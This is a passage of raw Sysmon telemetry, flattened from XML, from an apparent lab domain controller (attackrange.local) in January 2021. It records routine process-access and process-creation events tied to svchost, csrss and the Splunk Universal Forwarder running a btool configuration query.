13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4326-6000-C700-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4326-6000-C600-000000009A01}45724584C:\Windows\system32\cmd.exe{08A6967A-4326-6000-C700-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.400{08A6967A-4326-6000-C700-000000009A01}4592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4326-6000-C600-000000009A01}4572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000003758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-C600-000000009A01}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4326-6000-C600-000000009A01}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.388{08A6967A-4325-6000-BF00-000000009A01}18403796C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-4326-6000-C600-000000009A01}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.394{08A6967A-4326-6000-C600-000000009A01}4572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-BF00-000000009A01}1840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.357{08A6967A-4326-6000-C500-000000009A01}32802968C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.122{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4326-6000-C500-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:06.106{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4326-6000-C500-000000009A01}3280C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 